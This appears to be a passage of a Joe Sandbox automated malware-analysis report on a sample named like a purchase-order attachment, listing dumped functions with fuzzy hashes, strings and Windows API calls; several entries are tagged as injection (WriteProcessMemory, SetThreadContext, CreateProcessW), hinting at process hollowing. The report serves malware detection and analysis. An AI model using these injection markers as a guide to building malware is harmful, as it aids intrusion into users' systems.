Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: d&%
API String ID: 0-3965400553
Opcode ID: 06790df1ed563210be6ad0f74564d5d5b2115f631fd65cbef7fdad7a12fc4e01
Instruction ID: dd3af01450e445b96adf2d230fae9c8612c265697d821203b31deb0458ebbf0c
Opcode Fuzzy Hash: 06790df1ed563210be6ad0f74564d5d5b2115f631fd65cbef7fdad7a12fc4e01
Instruction Fuzzy Hash: 1CA143B5E14209CFDB08DFA9E845ADEFBB2EF89310F10902AD415BB654DB359901CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07998678 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

QN#, xrefs: 079989CC

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: QN#
API String ID: 0-1466398418
Opcode ID: 378a2462f01b6025502c4d8c838ded443bf04e2f5cfccc1373a6bc358fea062a
Instruction ID: a64d28cd26ab7bb1266faf837c404b5050dda5197d6b52589a5b577239307e27
Opcode Fuzzy Hash: 378a2462f01b6025502c4d8c838ded443bf04e2f5cfccc1373a6bc358fea062a
Instruction Fuzzy Hash: 2AB115B4E056198BDF04CFE9CA8199EFBF2BF8A318F14C569C405BB318D73499428B65

Uniqueness

Uniqueness Score: -1.00%

Function 07998669 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

QN#, xrefs: 079989CC

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: QN#
API String ID: 0-1466398418
Opcode ID: 034236d8d7ded5793fbbbb52082a862cefafdeb9b76616154f4ffc62c41af95b
Instruction ID: f3c1741f6a36e67b9d16c9902adc451230b4a394f99d1dd141c3a108966245e1
Opcode Fuzzy Hash: 034236d8d7ded5793fbbbb52082a862cefafdeb9b76616154f4ffc62c41af95b
Instruction Fuzzy Hash: B1B127B4E096098BDF04CFA9CA819DEFBF2BF8A314F148569C405BB318D7349942CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0798F880 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

d&%, xrefs: 0798FA2C

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: d&%
API String ID: 0-3965400553
Opcode ID: 66b696c902d1cfdd1e7cd798a0c336bd53eed83be1e277268cf64b8c916cc1dd
Instruction ID: ed630642440afe62604a5b91a7d9f2e3622a58e88672067be17001f1a347196e
Opcode Fuzzy Hash: 66b696c902d1cfdd1e7cd798a0c336bd53eed83be1e277268cf64b8c916cc1dd
Instruction Fuzzy Hash: FF8103B4E14209CFCB48DFEAD884AAEFBB2EF89304F10942AD419BB254D7359901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07986698 Relevance: .9, Instructions: 907COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d663159bbc786d3166b00ae623e53ee03f97cd2d715f55e6e993c4a627893e46
Instruction ID: 07c6705abb0528176134b30bc7dfa41b0861357e3d6133f6b4ccb3b3e2d8c5af
Opcode Fuzzy Hash: d663159bbc786d3166b00ae623e53ee03f97cd2d715f55e6e993c4a627893e46
Instruction Fuzzy Hash: DB824CB0600206DFCB54EFA8D984AAEBBF6BF88318F158569E405DB7A1D731EC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 079815E0 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63621ebf7737d38cf49ea3ca760096fb7a469056eeaab4fc8150ea9b09b84850
Instruction ID: cab341a2073ebeda6989652c690e03acc9ac648b1f62c8cb41d20df7129df760
Opcode Fuzzy Hash: 63621ebf7737d38cf49ea3ca760096fb7a469056eeaab4fc8150ea9b09b84850
Instruction Fuzzy Hash: AD227E74A10219CFCB54DF68C884A9DBBB6FF85314F1585A9D809AB325DB30ED86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0F2E0DD3 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355795590.000000000F2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f2e0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0040398b487941f1f523b8c0540f4bd8529e5ca714fe018722191e2067d6446f
Instruction ID: e3bb9061d3011b2f4da7a94870b3baa70c566bd08e14cdba1870d46913be8ec1
Opcode Fuzzy Hash: 0040398b487941f1f523b8c0540f4bd8529e5ca714fe018722191e2067d6446f
Instruction Fuzzy Hash: 7DD1BB30B117068FDB29DB75C850BAEB7F7AF89300FA444ADD0459B692DB74E902CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07991799 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb53265edae346f4e968709a24deea33327d67771cce9b8b612192ab5fc6b1d5
Instruction ID: 2a17cf100a8da6d5353ab224fa80aaebf1a5055f77649156b6d48ec00dd13efa
Opcode Fuzzy Hash: fb53265edae346f4e968709a24deea33327d67771cce9b8b612192ab5fc6b1d5
Instruction Fuzzy Hash: BDE1BEB5E1420BCFDB04EF9AD4858EEFBB2FF89314B10856AD415AB214D7349942CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07990006 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb38db2dc1a4fd423d4d4c1bc966354adcb999dd9160bb9cb75b2f78de84488
Instruction ID: 4a7c1e39a897fe6c91f33bbd8fe31cd860bef50a1abd7effe950cfb22761cc89
Opcode Fuzzy Hash: 1cb38db2dc1a4fd423d4d4c1bc966354adcb999dd9160bb9cb75b2f78de84488
Instruction Fuzzy Hash: 0F5127B1E0461ACFDB08CFA9D8406AEFBF2FF89214F14C06AD419A7255D7784A41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0799CD48 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae177a6b60c554f28e96d7039310bd54479a58a29b00f96b67d493bbff072c3e
Instruction ID: 3e6d55c88fd684d90a4fcd1b32d0cca4b5048bacda0f8325cd4004741900643a
Opcode Fuzzy Hash: ae177a6b60c554f28e96d7039310bd54479a58a29b00f96b67d493bbff072c3e
Instruction Fuzzy Hash: 4B515AB5E1422ACBDB24CF69CD44BE9B7B6FF89300F1081FAD509A7654EB705A818F40

Uniqueness

Uniqueness Score: -1.00%

Function 07990040 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3128b4ac8f15e28b25012ec739f9ff16121aabe964e5e5e3e90e0d264bc8fe
Instruction ID: c2a400d878c30b093873aa41c9ddde7e0691e8316f032e775cb2fd9ba7007576
Opcode Fuzzy Hash: 1e3128b4ac8f15e28b25012ec739f9ff16121aabe964e5e5e3e90e0d264bc8fe
Instruction Fuzzy Hash: 4C5139B4E0460ACFDB08CFAAD9406AEFBF2FF89200F14D42AD419B7254D7749A41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0798A290 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b61a9812771e84b1b4a3f7b4aa15b14c16229dfdf16328cf60b90a1f5ba896
Instruction ID: 3f8cdf884a0f5775a87c19a56a96d1b12d551be8b53ee7b3f0829374d32d7016
Opcode Fuzzy Hash: 60b61a9812771e84b1b4a3f7b4aa15b14c16229dfdf16328cf60b90a1f5ba896
Instruction Fuzzy Hash: 075103B0E042199FCB04DFAAC5809AEFBF2FF89314F18C56AE409A7355DB349941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0799003A Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7a9d748bb5f2e636bc7dcc6173d944995ab98febee1f5698930f8e2a31e2bd2
Instruction ID: 05369241d620a67dfe32e21168d1c2084e88bd96601ebac59ed61f70dd1ec0fc
Opcode Fuzzy Hash: d7a9d748bb5f2e636bc7dcc6173d944995ab98febee1f5698930f8e2a31e2bd2
Instruction Fuzzy Hash: 975128B4E0461A8FDB08CFAAD9406AEFBF2FF89204F14D42AD419B7254E7744A41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 07990A08 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e083945e3ee9e876b43fa9212f0daaad0f05b4fea59d1ff03682244aae7232
Instruction ID: bf9bdf188809a8c307f74eae431feb3c92dd722a2afcb33177c43067a66d6063
Opcode Fuzzy Hash: 51e083945e3ee9e876b43fa9212f0daaad0f05b4fea59d1ff03682244aae7232
Instruction Fuzzy Hash: D751F7B4E05259CFDB64CFAAD9446DDBBF2BF89311F1080AAD409AB354DB349A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 079909F8 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b923301956880517b528cd230e39dd0f79cd5a1f655f4bffdfd7d5b96c4a9077
Instruction ID: d71c8060c8f3b029dc6e9f87103719ec6b4ddd06ab4076e649d8fe00d66172ad
Opcode Fuzzy Hash: b923301956880517b528cd230e39dd0f79cd5a1f655f4bffdfd7d5b96c4a9077
Instruction Fuzzy Hash: B54118B4D052598FDB24CFAAC9446DEFBF2BF89310F1480A9D409AB354DB345A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0F2E0D08 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355795590.000000000F2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f2e0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8579b03646197be4ccdacb8f8571b12aed8ca986a1b4036f3f32acb93cef09da
Instruction ID: 77f7a3d5f3fa59b95403fdd59c4f950ef8e49e875bf2d286eaaeb290ca2e957f
Opcode Fuzzy Hash: 8579b03646197be4ccdacb8f8571b12aed8ca986a1b4036f3f32acb93cef09da
Instruction Fuzzy Hash: 2A11AF71D122188EDB14CFE4D8147FEBBB0EB49311F549066D005B3286CBB89985DB68

Uniqueness

Uniqueness Score: -1.00%

Function 07993F50 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b0e52d9882cd4ef3ae91a726f199e38ac5a09814fa20270ef965001e6e122c
Instruction ID: 568cea2a456d9490bfe3dba6171f31b0d76e4d69a0b9eb659d7bd8c1444eeee0
Opcode Fuzzy Hash: 72b0e52d9882cd4ef3ae91a726f199e38ac5a09814fa20270ef965001e6e122c
Instruction Fuzzy Hash: C621FFB1E156189BEB58CF6BDD4069EFBF7AFC8204F04C179C908A7264EB340A468F51

Uniqueness

Uniqueness Score: -1.00%

Function 0F2E0D18 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355795590.000000000F2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f2e0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd576b30411a794854b1cf4ddfc5a9b70a9c1a51bef703f019d6f00cab3264f
Instruction ID: c864de3976ad0ffce5842df0a03efdd750467e7aba07d7af005c3f96200c8bbb
Opcode Fuzzy Hash: dcd576b30411a794854b1cf4ddfc5a9b70a9c1a51bef703f019d6f00cab3264f
Instruction Fuzzy Hash: A3111530D152598FDB18CFA5D418BEEBAF1EB4E311F64906AD001B3285C7B8A985CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0160BAC0 Relevance: 6.1, APIs: 4, Instructions: 123
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0160BB30
GetCurrentThread.KERNEL32 ref: 0160BB6D
GetCurrentProcess.KERNEL32 ref: 0160BBAA
GetCurrentThreadId.KERNEL32 ref: 0160BC03

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 16f067dd1e7f3eae1431c72b253bcf8ec89d7f142fc49e7e534119d6786d6555
Instruction ID: 161b96845aaea90e84865eaece2ffd9c58381d5e4db5baf1f99f28347261c885
Opcode Fuzzy Hash: 16f067dd1e7f3eae1431c72b253bcf8ec89d7f142fc49e7e534119d6786d6555
Instruction Fuzzy Hash: EE5134B4D006498FDB18CFAAC948BEEBBF0AB48318F24845DE419B7394DB745885CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0160BAD0 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0160BB30
GetCurrentThread.KERNEL32 ref: 0160BB6D
GetCurrentProcess.KERNEL32 ref: 0160BBAA
GetCurrentThreadId.KERNEL32 ref: 0160BC03

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0d9ba01a2dac812538bba1ffc80996332e30306a3abcaf81a83ac2a4d5aa6aba
Instruction ID: 386e935d175dd409dce6bd5e3feea320f9221aa8bb8f710c99d23f808c0016f6
Opcode Fuzzy Hash: 0d9ba01a2dac812538bba1ffc80996332e30306a3abcaf81a83ac2a4d5aa6aba
Instruction Fuzzy Hash: E95124B4D006498FDB14CFAAD948BDEBBF0AB48318F24845DE419A7394DB746884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0798A689 Relevance: 5.2, Strings: 4, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XcOl, xrefs: 0798A79F
XcOl, xrefs: 0798A75E
XcOl, xrefs: 0798A793
XcOl, xrefs: 0798A750

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: XcOl$XcOl$XcOl$XcOl
API String ID: 0-1732477512
Opcode ID: 1d4cbab3697acd3f571300abd6cc6581c6fcf7a84bf61d4ce3a69835e401b6fe
Instruction ID: 7f4332fc72d7051e0f51bb00c53bc6146af6653e1e5142c9bb089017b5850fd0
Opcode Fuzzy Hash: 1d4cbab3697acd3f571300abd6cc6581c6fcf7a84bf61d4ce3a69835e401b6fe
Instruction Fuzzy Hash: 28618B75B041168FCB54EF68D545AADBBF6FF89314F15806AE902AB390CB70DC42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07984D40 Relevance: 2.8, Strings: 2, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XcOl, xrefs: 07984DDF
XcOl, xrefs: 07984DD5

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: XcOl$XcOl
API String ID: 0-4280172384
Opcode ID: 69dae544cc2cc467dbe254c7f37ef0eb70077e926a2e54a3025e41e53836541c
Instruction ID: 4bc3c8ee1007c2760b16eff18c3fb2a27af59f1cef07da3715593123e56bc2e8
Opcode Fuzzy Hash: 69dae544cc2cc467dbe254c7f37ef0eb70077e926a2e54a3025e41e53836541c
Instruction Fuzzy Hash: F4A10C7470424A9FCB58EF64D859BAE7BA6FF88309F048428E506CB290CF708C12CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07985440 Relevance: 2.7, Strings: 2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XcOl, xrefs: 079855BB
XcOl, xrefs: 079855B1

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: XcOl$XcOl
API String ID: 0-4280172384
Opcode ID: f50b432fda65f1c698a1fcfc55e1e90be716954252aea0f67af0e979ca8c993d
Instruction ID: f3eae8ab11440662526001215cdae8f68a1ff2952b42a0a9b2cb1ebdf2499a94
Opcode Fuzzy Hash: f50b432fda65f1c698a1fcfc55e1e90be716954252aea0f67af0e979ca8c993d
Instruction Fuzzy Hash: C781C2B4B00506CFCB94EF68C484969BBF6FF89318B1A8269D406DB361DB31EC55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 079975D4 Relevance: 1.6, APIs: 1, Instructions: 146
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0799EBA3

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b9a1e1823348c1ea222b2b5671a2c29d95fd2b4c832186eabad73defce9633b5
Instruction ID: 5b396c38c4c49089c4c9b0475bbe5ca36d76cbbe6a002aa830df9fc2b42e7703
Opcode Fuzzy Hash: b9a1e1823348c1ea222b2b5671a2c29d95fd2b4c832186eabad73defce9633b5
Instruction Fuzzy Hash: 155107B19013299FDF64CF99C880BDDBBB5BF88314F0584A9E509B7250DB709A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07997318 Relevance: 1.6, APIs: 1, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07997393

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0bec7f5bf26eb5234bc181c744e6d7b9f6c445394ffe7c2d01dc59ae794978c8
Instruction ID: 5941276e7bdfa85c8f240d4db654cd0ac32b1a8de52c9f47bc5a33294e9fe3ff
Opcode Fuzzy Hash: 0bec7f5bf26eb5234bc181c744e6d7b9f6c445394ffe7c2d01dc59ae794978c8
Instruction Fuzzy Hash: 47213AB5D002099FDB10CF9AD885BDEFBF4EB48324F10856AE868A7640D774A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0799F110 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0799F19D

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8ec33f431768fb47fceb0b81756c680143c02bdd308e67711ca13a2a65c849f0
Instruction ID: e28be7c204aa8dafcdb1fb8595325a1e45eb422ae54da57396f76dafcbce5cf1
Opcode Fuzzy Hash: 8ec33f431768fb47fceb0b81756c680143c02bdd308e67711ca13a2a65c849f0
Instruction Fuzzy Hash: D22100B1900209DFDB10CF9AC885BDEBBF8FB48314F00842AE919A3240D778A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0160C100 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0160C187

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fb4e2993e15409381f782faaaf213dab451aea59125464b5a6b8f17b06e50270
Instruction ID: 14ff4f755cb23a06990074041db8562dc8b90f3c85b9e56ba3162f778f1e2669
Opcode Fuzzy Hash: fb4e2993e15409381f782faaaf213dab451aea59125464b5a6b8f17b06e50270
Instruction Fuzzy Hash: FF21D3B5D00209AFDB10CFAAD884ADEBFF8FB48324F14855AE915A7350D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0160C0FF Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0160C187

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 617445c61e1f4eaa3a96d090d29e08ecfdb346be15225724a5517c7d759ec07b
Instruction ID: 57af1dcf745931830aaabc2cc08f7fd9a271594f8a6c73f9017b896423fbb698
Opcode Fuzzy Hash: 617445c61e1f4eaa3a96d090d29e08ecfdb346be15225724a5517c7d759ec07b
Instruction Fuzzy Hash: A521E2B5D002089FDB00CFA9D984AEEBBF4EB48320F14845AE915B3350D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0799EE80 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0799EEFF

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 42b26c9d2e4420ea0afb800acf2f9cd445342e91185117ffb68180a0501aaa4a
Instruction ID: 62afb85d86a80eab98ddc426eae66031ee9862e2efb279bfa4e2e144db712392
Opcode Fuzzy Hash: 42b26c9d2e4420ea0afb800acf2f9cd445342e91185117ffb68180a0501aaa4a
Instruction Fuzzy Hash: 8221E2B6D002599FCB10CF9AC885BDEBBF4FB48324F50842AE918A7250D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0799EDC0 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0799EE37

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8135fcdc142ac9b4473852b8edf8f0772f436476b3918e46b19b1d97484a10b1
Instruction ID: a8cf731405aadb7e01e4f6789f7a8e2ec6e8ab01cc8dcc590589d2f15fa4e6ba
Opcode Fuzzy Hash: 8135fcdc142ac9b4473852b8edf8f0772f436476b3918e46b19b1d97484a10b1
Instruction Fuzzy Hash: 4E21EAB1D0061A9FDB10CF9AC845BDEFBF4FB48214F55812AD418B7640D774A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01608B90 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01609AA9,00000800,00000000,00000000), ref: 01609CBA

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d0f5918c84837ff92a246677cba323df5921223a8733302e67a595a5243602ce
Instruction ID: 5fbb8a406f9e4665d653d77b3696ca66262498901a158d9ad68e6bb561812d07
Opcode Fuzzy Hash: d0f5918c84837ff92a246677cba323df5921223a8733302e67a595a5243602ce
Instruction Fuzzy Hash: 9A11F2B6D002098BDB14CF9AC848BDEBBF5EB48314F05842EE919A7640C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07997320 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07997393

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
